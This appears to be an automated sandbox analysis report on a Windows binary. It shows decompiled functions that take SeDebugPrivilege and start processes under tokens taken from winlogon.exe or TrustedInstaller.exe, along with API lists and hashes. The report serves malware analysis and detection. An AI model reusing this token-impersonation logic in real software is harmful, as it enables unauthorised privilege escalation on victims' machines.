                                                                                                                            • Opcode Fuzzy Hash: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                                            • Instruction Fuzzy Hash: 03F14F72900218AADB20EFA5CD85ADEB7B8EF04304F1045BBE619B71D1D7789A84CF59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00408533, Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 259COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 89%
                                                                                                                            			E00408533(void* __ecx, void* __edx, void* __eflags, char _a8, intOrPtr _a12, char _a32, WCHAR* _a40, WCHAR* _a44, intOrPtr _a48, WCHAR* _a52, WCHAR* _a56, char _a60, int _a64, char* _a68, int _a72, char _a76, int _a80, char* _a84, int _a88, long _a92, void _a94, long _a620, void _a622, char _a1132, char _a1148, WCHAR* _a3196, WCHAR* _a3200, WCHAR* _a3204, WCHAR* _a3208, void* _a3212, char _a3216, int _a5264, int _a5268, int _a5272, int _a5276, int _a5280, char _a5288, char _a5292, int _a7340, int _a7344, int _a7348, int _a7352, int _a7356) {
				char _v0;
				WCHAR* _v4;
				void* __edi;
				void* __esi;
				void* _t76;
				void* _t82;
				wchar_t* _t85;
				void* _t86;
				void* _t87;
				intOrPtr _t92;
				wchar_t* _t93;
				intOrPtr _t95;
				int _t106;
				char* _t110;
				intOrPtr _t115;
				wchar_t* _t117;
				intOrPtr _t124;
				wchar_t* _t125;
				intOrPtr _t131;
				wchar_t* _t132;
				int _t156;
				void* _t159;
				intOrPtr _t162;
				void* _t177;
				void* _t178;
				void* _t179;
				intOrPtr _t181;
				int _t187;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr _t198;
				signed int _t205;
				signed int _t206;

				_t179 = __edx;
				_t158 = __ecx;
				_t206 = _t205 & 0xfffffff8;
				E0040B550(0x1ccc, __ecx);
				_t76 = E0040313D(_t158);
				if(_t76 != 0) {
					E0040AC52();
					SetErrorMode(0x8001); // executed
					_t156 = 0;
					 *0x40fa70 = 0x11223344;
					EnumResourceTypesW(GetModuleHandleW(0), E0040A3C1, 0); // executed
					_t82 = E00405497( &_a8);
					_a48 = 0x20;
					_a40 = 0;
					_a52 = 0;
					_a44 = 0;
					_a56 = 0;
					E004056B5(_t158, __eflags, _t82, _a12);
					E00408F48(_t158, __eflags, L"SeDebugPrivilege"); // executed
					 *_t206 = L"/SpecialRun";
					_t85 = E0040585C( &_v0);
					__eflags = _t85;
					if(_t85 != 0) {
						L8:
						_t86 = E0040585C( &_a8, L"/Run");
						__eflags = _t86 - _t156;
						if(_t86 < _t156) {
							_t87 = E0040585C( &_a8, L"/cfg");
							__eflags = _t87 - _t156;
							if(_t87 >= _t156) {
								_t162 =  *0x40fa74; // 0x4101c8
								_t41 = _t87 + 1; // 0x1
								ExpandEnvironmentStringsW(E0040584C( &_a8, _t41), _t162 + 0x5504, 0x104);
								_t115 =  *0x40fa74; // 0x4101c8
								_t117 = wcschr(_t115 + 0x5504, 0x5c);
								__eflags = _t117;
								if(_t117 == 0) {
									_a92 = _t156;
									memset( &_a94, _t156, 0x208);
									_a620 = _t156;
									memset( &_a622, _t156, 0x208);
									GetCurrentDirectoryW(0x104,  &_a92);
									_t124 =  *0x40fa74; // 0x4101c8
									_t125 = _t124 + 0x5504;
									_v4 = _t125;
									_t187 = wcslen(_t125);
									_t51 = wcslen( &_a92) + 1; // 0x1
									__eflags = _t187 + _t51 - 0x104;
									if(_t187 + _t51 >= 0x104) {
										_a620 = _t156;
									} else {
										E00404BE4( &_a620,  &_a92, _v4);
									}
									_t131 =  *0x40fa74; // 0x4101c8
									_t132 = _t131 + 0x5504;
									__eflags = _t132;
									wcscpy(_t132,  &_a620);
								}
							}
							E00402F31(_t156);
							_t181 =  *0x40fa74; // 0x4101c8
							_pop(_t159);
							_a84 =  &_a8;
							_a76 = 0x40cb0c;
							_a88 = _t156;
							_a80 = _t156;
							E0040177C( &_a76, _t181 + 0x10, __eflags, _t156);
							_t92 =  *0x40fa74; // 0x4101c8
							__eflags =  *((intOrPtr*)(_t92 + 0x5710)) - _t156;
							if( *((intOrPtr*)(_t92 + 0x5710)) == _t156) {
								_t93 = E0040585C( &_a8, L"/savelangfile");
								__eflags = _t93;
								if(_t93 < 0) {
									E00406420();
									__imp__CoInitialize(_t156);
									_t95 =  *0x40fa74; // 0x4101c8
									E00408910(_t95 + 0x10, _t159, 0x416f60);
									 *((intOrPtr*)( *0x4158e0 + 8))(_t156);
									_t198 =  *0x40fa74; // 0x4101c8
									E00408910(0x416f60, 0x4158e0, _t198 + 0x10);
									E00402F31(1);
									__imp__CoUninitialize();
								} else {
									E004065BE(_t159);
								}
								goto L7;
							} else {
								_t64 = _t92 + 0x10; // 0x4101d8
								_a7356 = _t156;
								_a7352 = _t156;
								_a7340 = _t156;
								_a7344 = _t156;
								_a7348 = _t156;
								_t156 = E00401D40(_t179, _t64,  &_a5292);
								_t110 =  &_a5288;
								L6:
								E004035FB(_t110);
								L7:
								E004054B9( &_v0);
								E004099D4( &_a32);
								E004054B9( &_v0);
								_t106 = _t156;
								goto L2;
							}
						}
						_t26 = _t86 + 1; // 0x1
						_t173 = _t26;
						__eflags =  *((intOrPtr*)(E0040584C( &_a8, _t26))) - _t156;
						if(__eflags == 0) {
							E00402F31(_t156);
						} else {
							E00402FC6(_t173, __eflags, _t138);
						}
						_t188 =  *0x40fa74; // 0x4101c8
						_a68 =  &_a8;
						_a60 = 0x40cb0c;
						_a72 = _t156;
						_a64 = _t156;
						E0040177C( &_a60, _t188 + 0x10, __eflags, _t156);
						_t190 =  *0x40fa74; // 0x4101c8
						_a5280 = _t156;
						_a5276 = _t156;
						_a5264 = _t156;
						_a5268 = _t156;
						_a5272 = _t156;
						_t156 = E00401D40(_t179, _t190 + 0x10,  &_a3216);
						_t110 =  &_a3212;
						goto L6;
					}
					__eflags = _a56 - 3;
					if(_a56 != 3) {
						goto L8;
					}
					__eflags = 1;
					_a3212 = 0;
					_a3208 = 0;
					_a3196 = 0;
					_a3200 = 0;
					_a3204 = 0;
					_v4 = 0;
					_v0 = 0;
					swscanf(E0040584C( &_v0, 1), L"%I64x",  &_v4);
					_t177 = 2;
					_push(E0040584C( &_v0, _t177));
					L0040B1F8();
					_pop(_t178);
					_t156 = E00401AC9(_t178, _t179, __eflags,  &_a1148, _v4, _v0, _t152);
					_t110 =  &_a1132;
					goto L6;
				} else {
					_t106 = _t76 + 1;
					L2:
					return _t106;
				}
			}




































                                                                                                                            0x00408533
                                                                                                                            0x00408533
                                                                                                                            0x00408536
                                                                                                                            0x0040853e
                                                                                                                            0x00408546
                                                                                                                            0x0040854d
                                                                                                                            0x00408559
                                                                                                                            0x00408563
                                                                                                                            0x00408569
                                                                                                                            0x00408572
                                                                                                                            0x00408583
                                                                                                                            0x0040858d
                                                                                                                            0x00408595
                                                                                                                            0x0040859e
                                                                                                                            0x004085a2
                                                                                                                            0x004085a6
                                                                                                                            0x004085aa
                                                                                                                            0x004085ae
                                                                                                                            0x004085b8
                                                                                                                            0x004085c1
                                                                                                                            0x004085c8
                                                                                                                            0x004085cd
                                                                                                                            0x004085cf
                                                                                                                            0x0040867f
                                                                                                                            0x00408688
                                                                                                                            0x0040868d
                                                                                                                            0x0040868f
                                                                                                                            0x00408730
                                                                                                                            0x00408735
                                                                                                                            0x00408737
                                                                                                                            0x0040873d
                                                                                                                            0x00408750
                                                                                                                            0x0040875d
                                                                                                                            0x00408763
                                                                                                                            0x00408770
                                                                                                                            0x00408775
                                                                                                                            0x00408779
                                                                                                                            0x0040878b
                                                                                                                            0x00408790
                                                                                                                            0x004087a2
                                                                                                                            0x004087aa
                                                                                                                            0x004087b8
                                                                                                                            0x004087be
                                                                                                                            0x004087c3
                                                                                                                            0x004087c9
                                                                                                                            0x004087d2
                                                                                                                            0x004087df
                                                                                                                            0x004087e3
                                                                                                                            0x004087e6
                                                                                                                            0x00408801
                                                                                                                            0x004087e8
                                                                                                                            0x004087f8
                                                                                                                            0x004087fe
                                                                                                                            0x00408811
                                                                                                                            0x00408816
                                                                                                                            0x00408816
                                                                                                                            0x0040881c
                                                                                                                            0x00408822
                                                                                                                            0x00408779
                                                                                                                            0x00408824
                                                                                                                            0x00408829
                                                                                                                            0x00408833
                                                                                                                            0x00408834
                                                                                                                            0x00408840
                                                                                                                            0x00408848
                                                                                                                            0x0040884c
                                                                                                                            0x00408850
                                                                                                                            0x00408855
                                                                                                                            0x0040885a
                                                                                                                            0x00408860
                                                                                                                            0x004088ac
                                                                                                                            0x004088b1
                                                                                                                            0x004088b3
                                                                                                                            0x004088bf
                                                                                                                            0x004088c5
                                                                                                                            0x004088cb
                                                                                                                            0x004088da
                                                                                                                            0x004088ea
                                                                                                                            0x004088ed
                                                                                                                            0x004088f8
                                                                                                                            0x004088ff
                                                                                                                            0x00408905
                                                                                                                            0x004088b5
                                                                                                                            0x004088b5
                                                                                                                            0x004088b5
                                                                                                                            0x00000000
                                                                                                                            0x00408862
                                                                                                                            0x00408862
                                                                                                                            0x0040886d
                                                                                                                            0x00408874
                                                                                                                            0x0040887b
                                                                                                                            0x00408882
                                                                                                                            0x00408889
                                                                                                                            0x00408895
                                                                                                                            0x00408897
                                                                                                                            0x00408658
                                                                                                                            0x00408658
                                                                                                                            0x0040865d
                                                                                                                            0x00408661
                                                                                                                            0x0040866a
                                                                                                                            0x00408673
                                                                                                                            0x00408678
                                                                                                                            0x00000000
                                                                                                                            0x00408678
                                                                                                                            0x00408860
                                                                                                                            0x00408695
                                                                                                                            0x00408695
                                                                                                                            0x0040869f
                                                                                                                            0x004086a2
                                                                                                                            0x004086af
                                                                                                                            0x004086a4
                                                                                                                            0x004086a7
                                                                                                                            0x004086a7
                                                                                                                            0x004086b4
                                                                                                                            0x004086bf
                                                                                                                            0x004086cb
                                                                                                                            0x004086d3
                                                                                                                            0x004086d7
                                                                                                                            0x004086db
                                                                                                                            0x004086e0
                                                                                                                            0x004086f1
                                                                                                                            0x004086f8
                                                                                                                            0x004086ff
                                                                                                                            0x00408706
                                                                                                                            0x0040870d
                                                                                                                            0x00408719
                                                                                                                            0x0040871b
                                                                                                                            0x00000000
                                                                                                                            0x0040871b
                                                                                                                            0x004085d5
                                                                                                                            0x004085da
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004085ec
                                                                                                                            0x004085ef
                                                                                                                            0x004085f6
                                                                                                                            0x004085fd
                                                                                                                            0x00408604
                                                                                                                            0x0040860b
                                                                                                                            0x00408612
                                                                                                                            0x00408616
                                                                                                                            0x00408620
                                                                                                                            0x0040862a
                                                                                                                            0x00408632
                                                                                                                            0x00408633
                                                                                                                            0x00408638
                                                                                                                            0x0040864f
                                                                                                                            0x00408651
                                                                                                                            0x00000000
                                                                                                                            0x0040854f
                                                                                                                            0x0040854f
                                                                                                                            0x00408550
                                                                                                                            0x00408556
                                                                                                                            0x00408556

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040313D: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                                              • Part of subcall function 0040313D: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                                                              • Part of subcall function 0040313D: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                                              • Part of subcall function 0040313D: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                                                            • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408563
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,0040A3C1,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040857C
                                                                                                                            • EnumResourceTypesW.KERNEL32 ref: 00408583
                                                                                                                            • swscanf.MSVCRT ref: 00408620
                                                                                                                            • _wtoi.MSVCRT ref: 00408633
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes_wtoiswscanf
                                                                                                                            • String ID: $%I64x$/Run$/cfg$/savelangfile$SeDebugPrivilege$`oA$XA
                                                                                                                            • API String ID: 3933224404-3784219877
                                                                                                                            • Opcode ID: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
                                                                                                                            • Instruction ID: 6a1ad454fb11d14b300c4ed281ce3bcdfe782ea4983c0409628bf6e0aeb57f2c
                                                                                                                            • Opcode Fuzzy Hash: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
                                                                                                                            • Instruction Fuzzy Hash: 7FA16F71508340DBD720EF65DD8599BB7E8FB88308F50493FF588A3292DB3899098F5A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401FE6, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 243processCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 81%
                                                                                                                            			E00401FE6(void* __eax, void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8, long _a12, void* _a16, WCHAR* _a20, struct _STARTUPINFOW* _a24, struct _PROCESS_INFORMATION* _a28) {
				int _v8;
				long _v12;
				wchar_t* _v16;
				void _v546;
				long _v548;
				void _v1074;
				char _v1076;
				void* __esi;
				long _t84;
				int _t87;
				wchar_t* _t88;
				int _t92;
				void* _t93;
				int _t94;
				int _t96;
				int _t99;
				int _t104;
				long _t105;
				int _t110;
				void** _t112;
				int _t113;
				intOrPtr _t131;
				wchar_t* _t132;
				int* _t148;
				wchar_t* _t149;
				int _t151;
				void* _t152;
				void* _t153;
				int _t154;
				void* _t155;
				long _t160;

				_t145 = __edx;
				_t152 = __ecx;
				_t131 =  *((intOrPtr*)(__eax + 0x44a8));
				_v12 = 0;
				if(_t131 != 4) {
					__eflags = _t131 - 5;
					if(_t131 != 5) {
						__eflags = _t131 - 9;
						if(__eflags != 0) {
							__eflags = _t131 - 8;
							if(_t131 != 8) {
								__eflags = _t131 - 6;
								if(_t131 != 6) {
									__eflags = _t131 - 7;
									if(_t131 != 7) {
										__eflags = CreateProcessW(_a4, _a8, 0, 0, 0, _a12, _a16, _a20, _a24, _a28);
									} else {
										_t132 = __eax + 0x46b6;
										_t148 = __eax + 0x48b6;
										__eflags =  *_t148;
										_v16 = _t132;
										_v8 = __eax + 0x4ab6;
										if( *_t148 == 0) {
											_t88 = wcschr(_t132, 0x40);
											__eflags = _t88;
											if(_t88 != 0) {
												_t148 = 0;
												__eflags = 0;
											}
										}
										_t153 = _t152 + 0x800;
										E0040289F(_t153);
										_t154 =  *(_t153 + 0xc);
										__eflags = _t154;
										if(_t154 == 0) {
											_t87 = 0;
											__eflags = 0;
										} else {
											_t87 =  *_t154(_v16, _t148, _v8, 1, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
										}
										__eflags = _t87;
									}
									if(__eflags == 0) {
										_t84 = GetLastError();
										L43:
										_v12 = _t84;
									}
									goto L44;
								}
								__eflags = E00401D99(__eax + 0x44ac, __edx);
								if(__eflags == 0) {
									goto L44;
								}
								_t92 = E0040A46C(_t131, __eflags,  &_a28, _t90, _a4, _a8, _a12, _a20, _a24, _a28);
								__eflags = _t92;
								if(_t92 != 0) {
									goto L44;
								}
								_t84 = _a28;
								goto L43;
							}
							_t93 = OpenSCManagerW(0, L"ServicesActive", 0x35); // executed
							__eflags = _t93;
							if(_t93 != 0) {
								E00401306(_t93); // executed
							}
							_v8 = 0;
							_t94 = E00401F04(_t145, _t152); // executed
							__eflags = _t94;
							_v12 = _t94;
							if(__eflags == 0) {
								_t96 = E00401DF9(_t145, __eflags, _t152, L"TrustedInstaller.exe",  &_v8); // executed
								__eflags = _t96;
								_v12 = _t96;
								if(_t96 == 0) {
									_t99 = E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
									__eflags = _t99;
									if(_t99 == 0) {
										_v12 = GetLastError();
									}
									CloseHandle(_v8); // executed
								}
								RevertToSelf(); // executed
							}
							goto L44;
						}
						_t104 = E0040598B(__edx, __eflags, __eax + 0x46b6);
						__eflags = _t104;
						if(_t104 == 0) {
							goto L44;
						}
						_v8 = 0;
						_t105 = E00401E44(_t152, _t104,  &_v8);
						goto L14;
					}
					_t149 = __eax + 0x44ac;
					_t110 = wcslen(_t149);
					__eflags = _t110;
					if(_t110 <= 0) {
						goto L44;
					} else {
						_v8 = 0;
						__eflags = E00404EA9(_t149, _t110);
						_t112 =  &_v8;
						_push(_t112);
						_push(_t149);
						if(__eflags == 0) {
							_push(_t152);
							_t113 = E00401DF9(_t145, __eflags);
						} else {
							L0040B1F8();
							_push(_t112);
							_push(_t152);
							_t113 = E00401E44();
						}
						_v12 = _t113;
						__eflags = _t113;
						goto L15;
					}
				} else {
					_v548 = 0;
					memset( &_v546, 0, 0x208);
					_v1076 = 0;
					memset( &_v1074, 0, 0x208);
					E00404C3C( &_v548);
					 *((intOrPtr*)(_t155 + 0x18)) = L"winlogon.exe";
					_t151 = wcslen(??);
					_t10 = wcslen( &_v548) + 1; // 0x1
					_t159 = _t151 + _t10 - 0x104;
					if(_t151 + _t10 >= 0x104) {
						_v1076 = 0;
					} else {
						E00404BE4( &_v1076,  &_v548, L"winlogon.exe");
					}
					_v8 = 0;
					_t105 = E00401DF9(_t145, _t159, _t152,  &_v1076,  &_v8);
					L14:
					_t160 = _t105;
					_v12 = _t105;
					L15:
					if(_t160 == 0) {
						if(E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28) == 0) {
							_v12 = GetLastError();
						}
						CloseHandle(_v8);
					}
					L44:
					return _v12;
				}
			}


































                                                                                                                            0x00401fe6
                                                                                                                            0x00401ff1
                                                                                                                            0x00401ff3
                                                                                                                            0x00401fff
                                                                                                                            0x00402002
                                                                                                                            0x004020a8
                                                                                                                            0x004020ab
                                                                                                                            0x004020f3
                                                                                                                            0x004020f6
                                                                                                                            0x00402162
                                                                                                                            0x00402165
                                                                                                                            0x004021f2
                                                                                                                            0x004021f5
                                                                                                                            0x00402235
                                                                                                                            0x00402238
                                                                                                                            0x004022be
                                                                                                                            0x0040223a
                                                                                                                            0x0040223a
                                                                                                                            0x00402240
                                                                                                                            0x0040224b
                                                                                                                            0x0040224e
                                                                                                                            0x00402251
                                                                                                                            0x00402254
                                                                                                                            0x00402259
                                                                                                                            0x0040225e
                                                                                                                            0x00402262
                                                                                                                            0x00402264
                                                                                                                            0x00402264
                                                                                                                            0x00402264
                                                                                                                            0x00402262
                                                                                                                            0x00402266
                                                                                                                            0x0040226c
                                                                                                                            0x00402271
                                                                                                                            0x00402274
                                                                                                                            0x00402276
                                                                                                                            0x0040229a
                                                                                                                            0x0040229a
                                                                                                                            0x00402278
                                                                                                                            0x00402296
                                                                                                                            0x00402296
                                                                                                                            0x0040229c
                                                                                                                            0x0040229c
                                                                                                                            0x004022c0
                                                                                                                            0x004022c2
                                                                                                                            0x004022c8
                                                                                                                            0x004022c8
                                                                                                                            0x004022c8
                                                                                                                            0x00000000
                                                                                                                            0x004022c0
                                                                                                                            0x00402201
                                                                                                                            0x00402203
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00402220
                                                                                                                            0x00402225
                                                                                                                            0x00402227
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040222d
                                                                                                                            0x00000000
                                                                                                                            0x0040222d
                                                                                                                            0x00402173
                                                                                                                            0x00402179
                                                                                                                            0x0040217b
                                                                                                                            0x0040217e
                                                                                                                            0x00402183
                                                                                                                            0x00402185
                                                                                                                            0x00402188
                                                                                                                            0x0040218d
                                                                                                                            0x0040218f
                                                                                                                            0x00402192
                                                                                                                            0x004021a2
                                                                                                                            0x004021a7
                                                                                                                            0x004021a9
                                                                                                                            0x004021ac
                                                                                                                            0x004021cc
                                                                                                                            0x004021d1
                                                                                                                            0x004021d3
                                                                                                                            0x004021db
                                                                                                                            0x004021db
                                                                                                                            0x004021e1
                                                                                                                            0x004021e1
                                                                                                                            0x004021e7
                                                                                                                            0x004021e7
                                                                                                                            0x00000000
                                                                                                                            0x00402192
                                                                                                                            0x004020fe
                                                                                                                            0x00402103
                                                                                                                            0x00402105
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00402111
                                                                                                                            0x00402114
                                                                                                                            0x00000000
                                                                                                                            0x00402114
                                                                                                                            0x004020ad
                                                                                                                            0x004020b4
                                                                                                                            0x004020b9
                                                                                                                            0x004020bc
                                                                                                                            0x00000000
                                                                                                                            0x004020c2
                                                                                                                            0x004020c4
                                                                                                                            0x004020ce
                                                                                                                            0x004020d0
                                                                                                                            0x004020d3
                                                                                                                            0x004020d4
                                                                                                                            0x004020d5
                                                                                                                            0x004020e6
                                                                                                                            0x004020e7
                                                                                                                            0x004020d7
                                                                                                                            0x004020d7
                                                                                                                            0x004020dd
                                                                                                                            0x004020de
                                                                                                                            0x004020df
                                                                                                                            0x004020df
                                                                                                                            0x004020ec
                                                                                                                            0x004020ef
                                                                                                                            0x00000000
                                                                                                                            0x004020ef
                                                                                                                            0x00402008
                                                                                                                            0x00402016
                                                                                                                            0x0040201d
                                                                                                                            0x0040202e
                                                                                                                            0x00402035
                                                                                                                            0x00402044
                                                                                                                            0x00402049
                                                                                                                            0x00402055
                                                                                                                            0x00402064
                                                                                                                            0x00402068
                                                                                                                            0x0040206e
                                                                                                                            0x0040208b
                                                                                                                            0x00402070
                                                                                                                            0x00402082
                                                                                                                            0x00402088
                                                                                                                            0x0040209e
                                                                                                                            0x004020a1
                                                                                                                            0x00402119
                                                                                                                            0x00402119
                                                                                                                            0x0040211b
                                                                                                                            0x0040211e
                                                                                                                            0x0040211e
                                                                                                                            0x00402149
                                                                                                                            0x00402151
                                                                                                                            0x00402151
                                                                                                                            0x00402157
                                                                                                                            0x00402157
                                                                                                                            0x004022cb
                                                                                                                            0x004022d2
                                                                                                                            0x004022d2

                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 0040201D
                                                                                                                            • memset.MSVCRT ref: 00402035
                                                                                                                              • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                              • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                            • wcslen.MSVCRT ref: 00402050
                                                                                                                            • wcslen.MSVCRT ref: 0040205F
                                                                                                                            • wcslen.MSVCRT ref: 004020B4
                                                                                                                            • _wtoi.MSVCRT ref: 004020D7
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0040214B
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00402157
                                                                                                                            • OpenSCManagerW.SECHOST(00000000,ServicesActive,00000035,?,?,00000000), ref: 00402173
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021D5
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021E1
                                                                                                                            • RevertToSelf.KERNELBASE(?,TrustedInstaller.exe,?,?), ref: 004021E7
                                                                                                                              • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                                              • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                                              • Part of subcall function 0040598B: memset.MSVCRT ref: 004059B5
                                                                                                                              • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 004059FA
                                                                                                                              • Part of subcall function 0040598B: wcschr.MSVCRT ref: 00405A0E
                                                                                                                              • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 00405A20
                                                                                                                              • Part of subcall function 0040598B: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                                              • Part of subcall function 0040598B: OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                                              • Part of subcall function 0040598B: CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                                              • Part of subcall function 0040598B: CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                                              • Part of subcall function 00401E44: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                                              • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                                              • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                                            • wcschr.MSVCRT ref: 00402259
                                                                                                                            • CreateProcessW.KERNEL32 ref: 004022B8
                                                                                                                            • GetLastError.KERNEL32(?,?,00000000), ref: 004022C2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandle$OpenProcess$ErrorLastmemsetwcslen$_wcsicmpwcschrwcscpy$CreateDirectoryManagerRevertSelfSystemToken_wtoiwcscat
                                                                                                                            • String ID: ServicesActive$TrustedInstaller.exe$winlogon.exe
                                                                                                                            • API String ID: 3201562063-2355939583
                                                                                                                            • Opcode ID: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                                            • Instruction ID: ccbcfbde9fdc9ff515b0a1e4c69409fc0ea490cdea51ab3e51e2115b03466e24
                                                                                                                            • Opcode Fuzzy Hash: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                                            • Instruction Fuzzy Hash: 02813A76800209EACF11AFE0CD899AE7BA9FF08308F10457AFA05B21D1D7798A549B59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00409921, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00409921(struct HINSTANCE__** __esi) {
				void* _t6;
				struct HINSTANCE__* _t7;
				_Unknown_base(*)()* _t12;
				CHAR* _t13;
				intOrPtr* _t17;

				if( *__esi == 0) {
					_t7 = E00405436(L"psapi.dll"); // executed
					 *_t17 = "GetModuleBaseNameW";
					 *__esi = _t7;
					__esi[1] = GetProcAddress(_t7, _t13);
					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
					__esi[4] = GetProcAddress( *__esi, "GetModuleFileNameExW");
					__esi[5] = GetProcAddress( *__esi, "EnumProcesses");
					_t12 = GetProcAddress( *__esi, "GetModuleInformation");
					__esi[3] = _t12;
					return _t12;
				}
				return _t6;
			}








                                                                                                                            0x00409924
                                                                                                                            0x0040992c
                                                                                                                            0x00409937
                                                                                                                            0x0040993f
                                                                                                                            0x0040994a
                                                                                                                            0x00409956
                                                                                                                            0x00409962
                                                                                                                            0x0040996e
                                                                                                                            0x00409971
                                                                                                                            0x00409973
                                                                                                                            0x00000000
                                                                                                                            0x00409976
                                                                                                                            0x00409977

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                              • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                              • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                              • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                            • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                                            • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                                            • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                                            • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                                            • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
